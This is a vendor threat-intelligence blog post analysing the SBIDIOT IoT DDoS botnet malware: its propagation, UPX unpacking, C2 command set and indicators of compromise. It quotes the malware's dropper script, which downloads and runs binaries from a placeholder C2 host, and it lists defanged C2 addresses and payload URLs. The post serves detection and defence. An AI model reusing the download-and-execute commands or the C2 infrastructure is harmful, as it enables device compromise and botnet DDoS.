# Threat Intelligence: Analysis of the SBIDIOT IoT Malware

**[nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/](https://www.nozominetworks.com/blog/threat-intelligence-analysis-of-the-sbidiot-iot-malware/)**

By April 7, 2021

There are billions of IoT connections in the world and more than 70 percent of them are in
the industrial sector. This is why Nozomi Networks Labs regularly reviews the threat
landscape for IoT devices. Recently, a malware sample named SBIDIOT caught our
attention. It had a relatively low number of detections on VirusTotal and its commands, in the
current form, were not well documented by the cybersecurity community.

We decided to analyze SBIDIOT and uncovered how it communicates with targets and what
types of commands it supports. This information helps detect the threat and allows defenders
to stop or mitigate it before harmful impacts occur. The main potential impact of DDoS
(Distributed Denial of Service) botnets is the generation of excessively high loads on
targeted servers, preventing users from accessing services and thus harming normal
business operations.

To avoid impacts, early detection is vital. Detection can be done by your security team (see
the malware indicators at the end of this article) or by using a network monitoring and threat
intelligence solution such as ours.


-----

There are more than 60 billion IoT devices in use by the industrial sector and many of them
[have little to no security. It’s therefore important to use threat intelligence to detect and](https://www.nozominetworks.com/products/threat-intelligence/)
mitigate IoT threats.

## Analysis of SBIDIOT Malware

Based on our information, at least one way that the malware propagates is by exploiting an
RCE vulnerability in ZTE routers. For older versions, we observed a shell script sh
downloading and executing binary payloads once delivered to the victim machines by
various means:
```
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
http://<cnc_ip>/SBIDIOT/x86; curl -O http://<cnc_ip>/SBIDIOT/x86;cat x86
>SSH;chmod +x *;./SSH SSH
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
http://<cnc_ip>/SBIDIOT/mips; curl -O http://<cnc_ip>/SBIDIOT/mips;cat mips
>SSH;chmod +x *;./SSH SSH
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
http://<cnc_ip>/SBIDIOT/mpsl; curl -O http://<cnc_ip>/SBIDIOT/mpsl;cat mpsl
>SSH;chmod +x *;./SSH SSH
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget
http://<cnc_ip>/SBIDIOT/arm; curl -O http://<cnc_ip>/SBIDIOT/arm;cat arm
>SSH;chmod +x *;./SSH SSH
...

```
The sample `e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9`
is packed with the standard UPX tool, with the UPX header later modified. While the malware
remains executable, it is no longer possible to unpack it using the same tool straight away:
```
$ file e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9
e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: ELF 32-bit
LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no
section header
$ upx -d e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2020
UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020

```
```
File size Ratio Format Name

```
```
--------- ------ ----- ---upx: e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9:
NotPackedException: not packed by UPX
Unpacked 0 files.

```

-----

As we can see here, the `UPX! signature was replaced with a custom` `YTS\x99 signature:`

Hex dump showing that the “UPX!” string has been replaced.
Restoring it back will enable us to unpack the sample using the standard UPX tool:
```
$ perl -pi -e 's/YTS\x99/UPX!/g'
e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9
$ upx -d e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2020
UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020

```
```
File size Ratio Format Name

```
```
--------- ------ ----- ---55372 <- 30024 54.22% linux/i386
e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9
Unpacked 1 file.
$ file e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9
e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9: ELF 32-bit
LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

```

-----

The analysis reveals characteristics quite common for this type of threat. There is a strong
focus on DDoS with some parts of the code shared with other malware families like Gafgyt.
Given that the sample is statically linked and stripped, which is almost always the case with
malware targeting IoT, the next step was to load FLIRT signatures for uClibc to make
analysis easier. uClibc is a compact C library commonly used in Linux kernel-based
embedded devices, which is also commonly used by IoT malware developers for easy crosscompilation, as popularized with Mirai. FLIRT signatures are essentially a method that
reverse engineering tools like IDA use to pattern-match known libraries, which can greatly
speed up the analysis process.


-----

A large number of functions are recognized using FLIRT.
Upon execution, the sample attempts to connect to its C2, which in this case is an IP
address and port hard-coded into the binary. Although the C2 infrastructure was not
operational during the time of the investigation, we were able to force the sample to talk to
our own server as its C2. Coupled with some static analysis, this was enough to quickly
figure out the protocol and begin interaction.
The function responsible for handling commands compares each command received from
C2 with one of the following strings:

TCP
HTTPSTOMP
VSE
HEX
STD
VOX
NFO
UDP
UDPH
R6
FN
OVHKILL
NFOKILL
STOP
Stop
stop

Then, based on the results, it performs several validation checks on its arguments before
executing the actual command.

## Commands Supported by SBIDIOT

**TCP**


-----

The TCP command asks the bot to send TCP segments destined for a specified host/port
combination for a specified interval of time. Additionally, it allows the operator to set a
number of optional TCP flags.

Custom TCP flags supported in the TCP command handler.
**HTTPSTOMP**
As arguments, it takes in an HTTP method, a host/port combination, an attack duration and a
request count specifying how many times to repeat this operation. If the attack duration and
the request count are not exceeded, this function will continue to perform HTTP requests
using the settings provided and a randomly selected user-agent string.


-----

Hard-coded list of user-agent strings.

HTTPSTOMP command handler.
Additionally, another function is called to perform HTTP requests to the /cdncgi/l/chk_captcha URI of a hostname/port combo with, once again, a configurable attack
duration and request count. This is done in an attempt to circumvent CloudFlare protection
mechanisms.
**VSE**


-----

Another command used for DDoS, which, depending on the arguments provided, employs
either UDP or RAW sockets. Again, arguments for the target and attack duration can be
provided, but additionally, the attacker can specify a pause interval between packets
delivered to the target. Variants of Gafgyt and other IoT malware occasionally include a VSE
command to target servers running the Valve Source Engine.

Code snippet from VSE command handler implementing pause interval.
**VOX**
The VOX command takes a host, a port and an attack duration as its arguments and then
sends UDP datagrams with one of three randomly selected hard-coded payloads.


-----

Recorded malicious UDP traffic containing hardcoded payloads.
**UDP**
The sample sends UDP payloads to a target host specifying the port, the attack duration and
the maximum size of the generated payload. The actual size of the payload may be smaller
due to the use of the `strlen function, which calculates the size by counting bytes up until`
the first null value.


-----

Command handler validating UDP arguments.
**HEX / STD / R6 / NFO / FN / OVHKILL / NFOKILL / UDPH**
All of the above commands call the same function, which receives a host name, a port and
an attack duration, then starts generating UDP traffic with a fixed payload.

Code diagram with several code blocks pointing to the same function.
**STOP/stop/Stop**
This command sends a SIGKILL signal to all process IDs that are currently being tracked,
giving the operator the ability to stop any of the process’ children.


-----

STOP command handler.

## Threat Intelligence is Needed to Defend Industrial Systems from IoT Malware

As the number of Internet-connected devices increases at a rate of more than 130 percent a
year, the threat landscape also rapidly evolves. New families of malware and modifications1
of existing ones emerge regularly. And, regardless of their complexity and sophistication,
they all pose a threat.

To defend against threats to IoT devices that could impact production, uptime and possibly
[safety, automated tools can help. OT/IoT network monitoring paired with regularly updated](https://www.nozominetworks.com/products/vantage/)
[threat intelligence identifies indicators of compromise and anomalous behavior, giving you](https://www.nozominetworks.com/products/threat-intelligence/)
the opportunity to act before harm occurs.

Nozomi Networks Labs is committed to providing real-time information on IoT threats as they
continue to increase in prevalence and significance for operational technology environments
– stay-tuned for ongoing updates.

_For indicators of SBIDIOT malware, see the information provided at the end of this page._

**References**

[1. “The Internet of Things: Consumer, Industrial & Public Services 2020-2024,” Juniper](https://www.juniperresearch.com/researchstore/devices-technology/internet-of-things-iot-data-research-report/subscription/consumer-industrial-public-services)

Networks, March 31, 2020.

**Related Content**


-----

RESEARCH REPORT

## OT/IoT Security Report

**What You Need to Know to Fight Ransomware and IoT Vulnerabilities**

**July 2021**

Why ransomware is a formidable threat
Analysis of DarkSide, the malware that attacked Colonial Pipeline
Latest ICS and medical device vulnerability trends
Why P2P security camera architecture threatens confidentiality
How security cameras are vulnerable
Ten measures to take immediately to defend your systems

[Download](https://www.nozominetworks.com/ot-iot-security-report/)
**Related Links**

Blog: [Defending Against IoT Security Camera Hacks Like Verkada](https://www.nozominetworks.com/blog/defending-against-iot-security-camera-hacks-like-verkada/https:/www.nozominetworks.com/blog/defending-against-iot-security-camera-hacks-like-verkada/)
Blog: [New Reolink P2P Vulnerabilities Show IoT Security Camera Risks](https://www.nozominetworks.com/blog/new-reolink-p2p-vulnerabilities-show-iot-security-camera-risks/)
Executive Brief: [Closing IoT Security Gaps in Your Operation](https://info.nozominetworks.com/executive-brief-closing-iot-security-gaps-in-your-operations-lp-1)

**SBIDIOT Malware Indicators**
**IOCs**

23.94.136[.]170:61930
hxxp://23 94 136[ ]170/SBIDIOT/x86


-----

e2b3ca0a97107fa351e39111c80b3fefd8cf178864fe82244d41eabe845af4b9

Same as for most modern IoT malware families, there are multiple other URLs associated
with the same C&C delivering payloads compiled for other architectures:

hxxp://23.94.136[.]170/SBIDIOT/arm
hxxp://23.94.136[.]170/SBIDIOT/arm6
hxxp://23.94.136[.]170/SBIDIOT/arm7
hxxp://23.94.136[.]170/SBIDIOT/mips
hxxp://23.94.136[.]170/SBIDIOT/mpsl
hxxp://23.94.136[.]170/SBIDIOT/ppc
647b71f683db54bc56873629973f56ac3b8ada33cf9e14706b5efe4d62f2f88f
b8b654b59e7f1de3107ff5e1c2a538f40f7dea6c63f25db26cf900d19218cccb
95bb118ecd3c724d6f8110ff7f1a90bac8b4067924f573bcbb17cd59a9ddb348
7a050fc54ab4dcfbd529a0a7e0b8b6bca9bc619ef7b332bfdc7667b8b7062e6c
ee3e341a0951d1e6f201665240f235eea56f9047d3a2664c53aeccd664057290
ca9bb8898d725ca1faf91d0973628a531f98a3d9dd35dd36ff9c8e621520a656

Other C&C IP addresses seen in 2021:

104.168.98[.]159
107.172.193[.]132
107.175.33[.]48
128.199.40[.]136
128.199.41[.]8
128.199.7[.]31
13.127.49[.]124
134.209.79[.]179
135.181.24[.]235
159.65.204[.]13
163.172.234[.]205
163.172.234[.]212
167.114.27[.]123
172.245.52[.]102
176.31.11[.]9
185.245.96[.]199
192.227.137[.]42
194.87.139[.]206
198.23.229[.]170
23.94.92[.]200
37.46.150[.]150
37 49 229[ ]154


-----

37.49.229[.]191
45.130.138[.]70
45.148.120[.]88
45.33.112[.]19
5.188.0[.]80
51.116.180[.]169
51.75.190[.]159
51.75.191[.]234
52.152.130[.]178
85.204.116[.]43

Other commonly used filenames:

sh (located in the root directory rather than in the SBIDIOT subdirectory like the rest of
the samples)
sh4
spc
root
rtk
zte
yarn


-----